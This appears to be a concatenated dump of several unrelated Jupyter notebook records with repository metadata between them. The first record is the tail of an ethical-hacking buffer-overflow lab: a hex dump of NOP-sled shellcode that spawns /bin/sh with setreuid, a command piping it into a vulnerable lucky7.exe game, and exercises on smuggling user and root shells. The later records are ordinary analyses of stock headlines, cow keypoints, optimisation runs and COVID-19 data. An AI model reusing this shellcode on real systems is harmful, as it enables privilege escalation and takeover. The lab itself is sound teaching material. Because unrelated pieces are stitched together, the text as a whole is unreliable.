"00000000 31 0a 6e 0a 35 0a 90 90 90 90 90 90 90 90 90 90 |1.n.5...........|\r\n00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|\r\n*\r\n00000040 90 90 90 90 90 90 90 31 c0 31 db 31 c9 99 b0 a4 |.......1.1.1....|\r\n00000050 cd 80 6a 0b 58 51 68 2f 2f 73 68 68 2f 62 69 6e |..j.XQh//shh/bin|\r\n00000060 89 e3 51 89 e2 53 89 e1 cd 80 41 01 05 08 0a 31 |..Q..S....A....1|\r\n00000070 0a |.|\r\n00000071\r\n"
]
],
[
[
"- exploit the program with the final exploit created\n\n``` \n$ cat lucky7_final_exploit.bin - | ./lucky7.exe\n```\n\n- NOTICE: the hyphen after the exploit\n- tells the cat program to send standard input after the exploit buffer, returning control of the input\n- eventhough the shell doesn't display its prompt, it is still accessible\n- stash both and user and root shell and force the program execute them\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ cat lucky7_final_exploit.bin - | ./lucky7.exe \n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: ��������������������������������������������������������1����$h/zsh/binh/usr ]\n[You have 918420 credits] -> Enter your choice [1-7]: \n~*~*~ Lucky 7 ~*~*~\nCosts 10 credits to play this game.\nMachine will generate 1 random numbers each between 1 and 9.\nIf the number is 7, you win a jackpot of 10 THOUSAND\nOtherwise, you lose.\n\n\n[DEBUG] current_game pointer 0x0804b0bf\nthe random number is: 7 \n*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*\nCongratulations!\n You have won the jackpot of 10000 (10K) credits!\n\nYou have 928410 credits\nWould you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: ��������������������������������������������������������1����$h/zsh/binh/usr �]\n[You have 928410 credits] -> Enter your choice [1-7]: \nChange user name\nEnter your new name:\nYour name has been changed.\n\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: �����������������������������������������������������������������1�1�1ə��j\n XQh//shh/bin��Q��S��]\n[You have 928410 credits] -> Enter your choice [1-7]: \n[DEBUG] current_game pointer 0x08050141\nls\nzsh: broken pipe cat lucky7_final_exploit.bin - | \nzsh: segmentation fault ./lucky7.exe\n\n```\n\n\n## Exercise\n- smuggle the shellcode into the name field, find it's address and exploit the program.\n- smuggle both user and root shells",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb29a38baf74f70cabb6d227f34618ba615f5091 | 31,875 | ipynb | Jupyter Notebook | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | Naive_Bayes_Classification.ipynb | sidn19/Stock-price-prediction | 05659f61b05cf708b74bb6aa2e08beaf1b752fd8 | [
"MIT"
] | null | null | null | 31.684891 | 3,842 | 0.293239 | [
[
[
"#import modules\nimport re\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import metrics\nfrom sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA",
"_____no_output_____"
],
[
"#import dataset\ndf = pd.read_csv(\"./Datasets/Combined_dataset.csv\", parse_dates=[\"Date\"], index_col=\"Date\")\ndf",
"_____no_output_____"
],
[
"df.info()",
"<class 'pandas.core.frame.DataFrame'>\nDatetimeIndex: 1595 entries, 2015-01-02 to 2021-06-04\nData columns (total 8 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 Headlines 1595 non-null object \n 1 Close/Last 1595 non-null float64\n 2 Volume 1595 non-null int64 \n 3 Open 1595 non-null float64\n 4 High 1595 non-null float64\n 5 Low 1595 non-null float64\n 6 Close_difference 1595 non-null float64\n 7 Impact 1595 non-null int64 \ndtypes: float64(5), int64(2), object(1)\nmemory usage: 112.1+ KB\n"
],
[
"#text cleaning\ncleaned_headlines = []\nps = PorterStemmer()\nfor i in range(0, len(df)):\n headlines = re.sub('[^a-zA-Z]', ' ', df['Headlines'][i])\n headlines = headlines.lower()\n headlines = headlines.split()\n headlines_stopwords = stopwords.words('english')\n headlines_stopwords.remove('not')\n headlines = [ps.stem(word) for word in headlines if not word in set(headlines_stopwords)]\n headlines = ' '.join(headlines)\n cleaned_headlines.append(headlines)\nlen(cleaned_headlines)",
"_____no_output_____"
],
[
"#vectorization\ncv = CountVectorizer()\nX = cv.fit_transform(cleaned_headlines).toarray()\nY = df.iloc[:, -1].values\nY",
"_____no_output_____"
],
[
"#split the data into train and test\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2,random_state=0)",
"_____no_output_____"
],
[
"#create model\nnb_model = GaussianNB()\nnb_model.fit(X_train,Y_train)",
"_____no_output_____"
],
[
"#predict Y\nY_predict = nb_model.predict(X_test)",
"_____no_output_____"
],
[
"np.concatenate((Y_predict.reshape(len(Y_predict),1), Y_predict.reshape(len(Y_predict),1)),1)",
"_____no_output_____"
],
[
"#check confusion matrix and accuracy\nprint(metrics.confusion_matrix(Y_test, Y_predict))\nprint(metrics.accuracy_score(Y_test, Y_predict))",
"[[ 67 84]\n [ 68 100]]\n0.5235109717868338\n"
],
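[
"# Additional check (added, not in the original run): per-class precision/recall/F1 for the\n# baseline Gaussian NB model, reusing Y_test and Y_predict computed above.\nprint(metrics.classification_report(Y_test, Y_predict))",
"_____no_output_____"
],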
[
"##Hyperparameter Tuning",
"_____no_output_____"
],
[
"cv_method = RepeatedStratifiedKFold(n_splits=5, n_repeats=3, random_state=999)",
"_____no_output_____"
],
[
"params_NB = {'var_smoothing': np.logspace(0,-9, num=10)}\ngs_NB = GridSearchCV(estimator=nb_model, param_grid=params_NB, cv=cv_method, verbose=1, scoring='accuracy')\ngs_NB.fit(X, Y)\nresult = gs_NB.cv_results_",
"Fitting 15 folds for each of 10 candidates, totalling 150 fits\n"
],
[
"print(\"Tuned Logistic Regression Parameters: {}\".format(gs_NB.best_params_)) \nprint(\"Best score is {}\".format(gs_NB.best_score_))",
"Tuned Logistic Regression Parameters: {'var_smoothing': 1.0}\nBest score is 0.5251828631138976\n"
],
[
" pipe = Pipeline(steps=[\n ('pca', PCA()),\n ('estimator', GaussianNB()),\n ])\n \nparameters = {'estimator__var_smoothing': [1e-11, 1e-10, 1e-9]}\nBayes = GridSearchCV(pipe, parameters, scoring='accuracy', cv=10).fit(X, Y)\nprint(Bayes.best_estimator_)\nprint('best score: {}'.format(Bayes.best_score_))\npredictions = Bayes.best_estimator_.predict(X_test)",
"Pipeline(steps=[('pca', PCA()), ('estimator', GaussianNB(var_smoothing=1e-11))])\nbest score: 0.4815133647798742\n"
],
[
"np.concatenate((predictions.reshape(len(predictions),1), predictions.reshape(len(predictions),1)),1)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb29b3fcb5d2d917c70974c5d01486011b73b453 | 6,266 | ipynb | Jupyter Notebook | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | test.ipynb | HongJinSeong/COW_KEY_POINT_DETECTION | ea62ed875e9b8533f1c09b56eb8aefba94b1b906 | [
"MIT"
] | null | null | null | 34.618785 | 151 | 0.545164 | [
[
[
"!python tools/test.py --cfg experiments/coco/hrnet/w48_256x192_adam_lr1e-3.yaml",
"=> creating output/coco/pose_hrnet/w48_256x192_adam_lr1e-3\n=> creating log/coco/pose_hrnet/w48_256x192_adam_lr1e-3_2021-07-29-09-21\nNamespace(cfg='experiments/coco/hrnet/w48_256x192_adam_lr1e-3.yaml', dataDir='', logDir='', modelDir='', opts=[], prevModelDir='')\nAUTO_RESUME: False\nCUDNN:\n BENCHMARK: True\n DETERMINISTIC: False\n ENABLED: True\nDATASET:\n COLOR_RGB: True\n DATASET: coco\n DATA_FORMAT: jpg\n FLIP: False\n HYBRID_JOINTS_TYPE: \n NUM_JOINTS_HALF_BODY: 8\n PROB_HALF_BODY: 0.3\n ROOT: datasets/\n ROT_FACTOR: 45\n SCALE_FACTOR: 0.35\n SELECT_DATA: False\n TEST_SET: train\n TRAIN_PATH: train\n TRAIN_SET: train\nDATA_DIR: \nDEBUG:\n DEBUG: True\n SAVE_BATCH_IMAGES_GT: True\n SAVE_BATCH_IMAGES_PRED: True\n SAVE_HEATMAPS_GT: True\n SAVE_HEATMAPS_PRED: True\nGPUS: (0,)\nLOG_DIR: log\nLOSS:\n TOPK: 8\n USE_DIFFERENT_JOINTS_WEIGHT: False\n USE_OHKM: False\n USE_TARGET_WEIGHT: True\nMODEL:\n EXTRA:\n FINAL_CONV_KERNEL: 1\n PRETRAINED_LAYERS: ['conv1', 'bn1', 'conv2', 'bn2', 'layer1', 'transition1', 'stage2', 'transition2', 'stage3', 'transition3', 'stage4']\n STAGE2:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4]\n NUM_BRANCHES: 2\n NUM_CHANNELS: [48, 96]\n NUM_MODULES: 1\n STAGE3:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4, 4]\n NUM_BRANCHES: 3\n NUM_CHANNELS: [48, 96, 192]\n NUM_MODULES: 4\n STAGE4:\n BLOCK: BASIC\n FUSE_METHOD: SUM\n NUM_BLOCKS: [4, 4, 4, 4]\n NUM_BRANCHES: 4\n NUM_CHANNELS: [48, 96, 192, 384]\n NUM_MODULES: 3\n HEATMAP_SIZE: [48, 64]\n IMAGE_SIZE: [192, 256]\n INIT_WEIGHTS: True\n NAME: pose_hrnet\n NUM_JOINTS: 17\n PRETRAINED: pretrain_models/animal/hrnet_w48_animalpose_256x256-34644726_20210426.pth\n SIGMA: 2\n TAG_PER_JOINT: True\n TARGET_TYPE: gaussian\nOUTPUT_DIR: output\nPIN_MEMORY: True\nPRINT_FREQ: 100\nRANK: 0\nTEST:\n BATCH_SIZE_PER_GPU: 1\n BBOX_THRE: 1.0\n COCO_BBOX_FILE: data/coco/person_detection_results/COCO_val2017_detections_AP_H_56_person.json\n FLIP_TEST: False\n IMAGE_THRE: 0.0\n IN_VIS_THRE: 0.2\n MODEL_FILE: output/coco/pose_hrnet/w48_256x192_adam_lr1e-3/checkpoint.pth\n NMS_THRE: 1.0\n OKS_THRE: 0.9\n POST_PROCESS: True\n SHIFT_HEATMAP: True\n SOFT_NMS: False\n USE_GT_BBOX: True\nTRAIN:\n BATCH_SIZE_PER_GPU: 32\n BEGIN_EPOCH: 0\n CHECKPOINT: \n END_EPOCH: 210\n GAMMA1: 0.99\n GAMMA2: 0.0\n LR: 0.001\n LR_FACTOR: 0.1\n LR_STEP: [170, 200]\n MOMENTUM: 0.9\n NESTEROV: False\n OPTIMIZER: adam\n RESUME: False\n SHUFFLE: True\n WD: 0.0001\nWORKERS: 1\n=> loading model from output/coco/pose_hrnet/w48_256x192_adam_lr1e-3/checkpoint.pth\n=> classes: ['__background__', 'cow']\n=> num_images: 1000\nloading annotations into memory...\nTraceback (most recent call last):\n File \"tools/test.py\", line 126, in <module>\n main()\n File \"tools/test.py\", line 105, in main\n valid_dataset = eval('dataset.'+cfg.DATASET.DATASET)(\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 131, in __init__\n self.db = self._get_db(self.data_ls)\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 171, in _get_db\n gt_db = self._load_coco_keypoint_annotations(ls)\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 183, in _load_coco_keypoint_annotations\n gt_db.extend(self._load_coco_keypoint_annotation_kernal(index))\n File \"/root/HRNET/tools/../lib/dataset/coco.py\", line 226, in _load_coco_keypoint_annotation_kernal\n im_ann = COCO(index)\n File \"/opt/conda/lib/python3.8/site-packages/pycocotools/coco.py\", line 85, in __init__\n dataset = json.load(f)\n File \"/opt/conda/lib/python3.8/json/__init__.py\", line 293, in load\n 
return loads(fp.read(),\n File \"/opt/conda/lib/python3.8/codecs.py\", line 322, in decode\n (result, consumed) = self._buffer_decode(data, self.errors, final)\nUnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 0: invalid start byte\n"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb29b506cfffce07600c45f8f3d4a14b579ac15e | 9,464 | ipynb | Jupyter Notebook | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | process_f0.ipynb | Dvermetten/DE_TIOBR | b26d0624773d19e178c0eb33350d42356626e10c | [
"BSD-3-Clause"
] | null | null | null | 33.441696 | 149 | 0.516484 | [
[
[
"This notebook contains the code needed to process the data which tracks the POIS and diversity, as generated by the SOS framework.\n\nBecause of the large size of these tables, not all in-between artifacts are provided.\n\nThis code is part of the paper \"The Importance of Being Restrained\".",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pickle\nimport pandas as pd\nfrom functools import partial\nimport glob \n\nimport seaborn as sbs\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import kendalltau, rankdata\n\nfont = {'size' : 20}\n\nplt.rc('font', **font)",
"_____no_output_____"
],
[
"base_folder = \"/mnt/e/Research/DE/\" #Update to required folder",
"_____no_output_____"
],
[
"output_location = \"Datatables/\"",
"_____no_output_____"
],
[
"def get_merged_dt(cross, sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}Runs_only/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['cross'] = cross\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n return dt_large",
"_____no_output_____"
],
[
"def get_full_dt():\n dt_full = pd.DataFrame()\n for cross in ['b','e']:\n for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for CR in ['005', '099']:\n for F in ['0916', '005']:\n for popsize in [5,20,100]:\n dt_temp = get_merged_dt(cross, sdis, F, CR, popsize)\n dt_full = dt_full.append(dt_temp)\n return dt_full",
"_____no_output_____"
],
[
"def get_merged_dt_v2(cross, sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}CosineSimilarity-MoreData/CosineSimilarity-MoreData/7/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['cross'] = cross\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'applied', 'accept', 'cross', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for cross in ['b','e']:\n for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for CR in ['005','0285','052','0755','099']:\n for F in ['005','0285','052','0755','099']:\n for popsize in [5,20, 100]:\n dt = get_merged_dt_v2(cross, sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DEro{cross}_{sdis}_p{popsize}_F{F}CR{CR}_cosine.csv\")",
"_____no_output_____"
],
[
"def get_merged_dt_v3(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}CosineSimilarity-LookingCloser/7/DErob{sdis}p{popsize}D30*F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for sdis in ['c', 'h', 'm', 's', 't', 'u']:\n for popsize in [5, 20, 100]:\n for idx_0, F in enumerate(['099','0755','052','0285','005']):\n for idx_1, CR in enumerate(['0041','0081','0121','0161','0201']):\n dt = get_merged_dt_v3(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v3.csv\")",
"_____no_output_____"
],
[
"def get_merged_dt_v4(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"{base_folder}Div_cos_sim/CosineSimilarity/7/DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for F in ['0285', '099', '052', '005']: #'0755', \n for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:\n for popsize in [5, 20, 100]:\n for sdis in ['t', 'h', 'm', 's', 'c', 'u']:\n dt = get_merged_dt_v4(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v4.csv\")",
"_____no_output_____"
],
[
"def get_diversity_dt(sdis, F, CR, popsize):\n dt_large = pd.DataFrame()\n files = glob.glob(f\"/mnt/e/Research/DE/Div_cos_sim/CosineSimilarity/7/Diversity-DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt\")\n if len(files) == 0:\n return dt_large\n for f in files:\n dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)\n dt_large = dt_large.append(dt_temp)\n dt_large['sdis'] = sdis\n dt_large['F'] = F\n dt_large['CR'] = CR\n dt_large['popsize'] = popsize\n dt_large.columns = ['div0', 'div1', 'sdis', 'F', 'CR', 'popsize']\n return dt_large",
"_____no_output_____"
],
[
"for F in ['0755','0285', '099', '052', '005']: \n for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:\n for popsize in [5, 20, 100]:\n for sdis in ['t', 'h', 'm', 's', 'c', 'u']:\n dt = get_diversity_dt(sdis, F, CR, popsize)\n dt.to_csv(f\"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_diversity.csv\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb29bca2366386726c89e84e8a908abf1737815c | 402,359 | ipynb | Jupyter Notebook | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | null | null | null | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | null | null | null | Coursera-Project-Network/COVID19-Data-Analysis-Using-Python/covid19-data-analysis-notebook.ipynb | fengjings/Coursera | 54098a9732faa4b37afe69d196e27805b1ac73aa | [
"MIT"
] | 1 | 2021-06-09T08:59:48.000Z | 2021-06-09T08:59:48.000Z | 102.225356 | 24,928 | 0.768948 | [
[
[
"# Welcome to Covid19 Data Analysis Notebook\n------------------------------------------",
"_____no_output_____"
],
[
"### Let's Import the modules ",
"_____no_output_____"
]
],
[
[
"import pandas as pd \nimport numpy as np \nimport seaborn as sns\nimport matplotlib.pyplot as plt \n",
"_____no_output_____"
]
],
[
[
"## Task 2 ",
"_____no_output_____"
],
[
"### Task 2.1: Importing the COVID-19 dataset\nImporting \"covid19_Confirmed_dataset.csv\" from the \"./Datasets\" folder. \n",
"_____no_output_____"
]
],
[
[
"corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')\ncorona_dataset_csv.head()",
"_____no_output_____"
]
],
[
[
"#### Let's check the shape of the dataframe",
"_____no_output_____"
]
],
[
[
"corona_dataset_csv.shape",
"_____no_output_____"
]
],
[
[
"### Task 2.2: Delete the useless columns",
"_____no_output_____"
]
],
[
[
"df = corona_dataset_csv.drop(['Lat','Long'],axis = 1)\ndf.head()",
"_____no_output_____"
],
[
"# if we want to change original file:\ncorona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')\ncorona_dataset_csv.drop(['Lat','Long'],axis=1,inplace=True)\ncorona_dataset_csv.head(10)",
"_____no_output_____"
]
],
[
[
"### Task 2.3: Aggregating the rows by the country",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated = corona_dataset_csv.groupby(\"Country/Region\").sum()\ncorona_dataset_aggregated.head(10)",
"_____no_output_____"
],
[
"corona_dataset_aggregated.shape",
"_____no_output_____"
]
],
[
[
"### Task 2.4: Visualizing data related to a country, for example China\nVisualization always helps for a better understanding of our data.",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China']",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].plot() # locate\ncorona_dataset_aggregated.loc['Italy'].plot()\ncorona_dataset_aggregated.loc['US'].plot()\nplt.legend()",
"_____no_output_____"
]
],
[
[
"### Task 3: Calculating a good measure \nWe need to find a good measure, represented as a number, that describes the spread of the virus in a country. ",
"_____no_output_____"
]
],
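A minimal illustrative sketch of this measure on a hypothetical cumulative-case series: the first difference gives the daily new cases, and its maximum is the quantity used below as the maximum infection rate.

```python
import pandas as pd

# Hypothetical cumulative confirmed cases over five days
cumulative = pd.Series([0, 2, 5, 30, 35],
                       index=pd.date_range("2020-01-22", periods=5))

daily_new = cumulative.diff()  # first derivative: new cases per day
print(daily_new.max())         # 25.0 -> the maximum infection rate
print(daily_new.idxmax())      # the day on which that maximum occurred
```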
[
[
"corona_dataset_aggregated.loc['China'].plot()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'][:5].plot()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].diff().plot()",
"_____no_output_____"
]
],
[
[
"### Task 3.1: Calculating the first derivative of the curve",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China'].diff().plot()",
"_____no_output_____"
]
],
[
[
"### Task 3.2: Find the maximum infection rate for China",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated.loc['China'].diff().max()",
"_____no_output_____"
],
[
"corona_dataset_aggregated.loc['China'].diff().argmax()",
"C:\\ProgramData\\Anaconda3\\lib\\site-packages\\ipykernel_launcher.py:1: FutureWarning: \nThe current behaviour of 'Series.argmax' is deprecated, use 'idxmax'\ninstead.\nThe behavior of 'argmax' will be corrected to return the positional\nmaximum in the future. For now, use 'series.values.argmax' or\n'np.argmax(np.array(values))' to get the position of the maximum\nrow.\n \"\"\"Entry point for launching an IPython kernel.\n"
],
[
"corona_dataset_aggregated.loc['China'].diff().idxmax()",
"_____no_output_____"
]
],
[
[
"### Task 3.3: find maximum infection rate for all of the countries. ",
"_____no_output_____"
]
],
[
[
"corona_dataset_aggregated = corona_dataset_csv.groupby(\"Country/Region\").sum()\ncountries = list(corona_dataset_aggregated.index)\nmax_infection_number = []\nmax_infection_date = []\nfor country in countries :\n max_infection_number.append(corona_dataset_aggregated.loc[country].diff().max())\n max_infection_date.append(corona_dataset_aggregated.loc[country].diff().idxmax())\ncorona_dataset_aggregated['max_infection_number'] = max_infection_number\ncorona_dataset_aggregated['max_infection_date'] = max_infection_date\ncorona_dataset_aggregated.head()",
"_____no_output_____"
]
],
[
[
"### Task 3.4: create a new dataframe with only needed column ",
"_____no_output_____"
]
],
[
[
"corona_data = pd.DataFrame(corona_dataset_aggregated['max_infection_number'])\ncorona_data.head()",
"_____no_output_____"
]
],
[
[
"### Task 4: \n- Importing the worldwide_happiness_report.csv dataset\n- Selecting the needed columns for our analysis \n- Joining the datasets \n- Calculating the correlations as the result of our analysis",
"_____no_output_____"
],
[
"### Task 4.1 : importing the dataset",
"_____no_output_____"
]
],
[
[
"world_happiness_report = pd.read_csv(\"Datasets/worldwide_happiness_report.csv\")\nworld_happiness_report.head(20)",
"_____no_output_____"
],
[
"world_happiness_report.shape",
"_____no_output_____"
]
],
[
[
"### Task 4.2: let's drop the useless columns ",
"_____no_output_____"
]
],
[
[
"world_happiness_report = pd.read_csv(\"Datasets/worldwide_happiness_report.csv\")\ncolumns_to_dropped = ['Overall rank','Score','Generosity','Perceptions of corruption']\nworld_happiness_report.drop(columns_to_dropped,axis=1 , inplace=True)\nworld_happiness_report.head()",
"_____no_output_____"
]
],
[
[
"### Task 4.3: changing the indices of the dataframe",
"_____no_output_____"
]
],
[
[
"# change index by name\nworld_happiness_report.set_index(['Country or region'],inplace=True)\nworld_happiness_report.head()",
"_____no_output_____"
]
],
[
[
"### Task 4.4: Now let's join the two datasets we have prepared ",
"_____no_output_____"
],
[
"#### Corona Dataset :",
"_____no_output_____"
]
],
[
[
"corona_data.head()",
"_____no_output_____"
],
[
"corona_data.shape",
"_____no_output_____"
]
],
[
[
"#### World happiness report Dataset:",
"_____no_output_____"
]
],
[
[
"world_happiness_report.head()",
"_____no_output_____"
],
[
"world_happiness_report.shape",
"_____no_output_____"
],
[
"data1 =corona_data.join(world_happiness_report)\nprint(data1.shape)\ndata1.head()",
"(187, 5)\n"
],
[
"data2 = corona_data.join(world_happiness_report, how='inner')  # inner join drops countries that are not in the happiness csv\nprint(data2.shape)\ndata2.head()",
"(143, 5)\n"
],
[
"# add corona data to the happiness data; if a country is in the corona data but not in the happiness data, it is not added\ndata3 = world_happiness_report.join(corona_data).copy()\nprint(data3.shape)\ndata3.head()",
"(156, 5)\n"
]
],
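The three shapes above (187, 143 and 156 rows) follow from the join type. A small sketch with made-up frames, assuming only standard pandas `join` semantics, makes the difference explicit.

```python
import pandas as pd

corona_toy = pd.DataFrame({'max_infection_number': [10, 20, 30]},
                          index=['A', 'B', 'C'])
happiness_toy = pd.DataFrame({'GDP per capita': [1.0, 2.0]},
                             index=['A', 'B'])

print(corona_toy.join(happiness_toy).shape)               # (3, 2): left join keeps every corona row, NaN for 'C'
print(corona_toy.join(happiness_toy, how='inner').shape)  # (2, 2): only countries present in both frames
print(happiness_toy.join(corona_toy).shape)               # (2, 2): left join from the happiness side
```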
[
[
"### Task 4.5: correlation matrix ",
"_____no_output_____"
]
],
[
[
"data1.corr()",
"_____no_output_____"
],
[
"data2.corr()",
"_____no_output_____"
],
[
"data3.corr()",
"_____no_output_____"
]
],
[
[
"### Task 5: Visualization of the results\nOur analysis is not finished unless we visualize the results in terms of figures and graphs so that everyone can understand what we get out of our analysis",
"_____no_output_____"
]
],
[
[
"print(data2.shape)\ndata2.head()",
"(143, 5)\n"
]
],
[
[
"### Task 5.1: Plotting GDP vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['GDP per capita']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))  # scatter plot\nplt.figure()\nsns.scatterplot(x,np.log(y))  # scatter plot of the log-scaled measure",
"_____no_output_____"
],
[
"sns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.2: Plotting Social support vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['Social support']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))  # scatter plot\nplt.figure()\nsns.scatterplot(x,np.log(y))  # scatter plot of the log-scaled measure\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.3: Plotting Healthy life expectancy vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
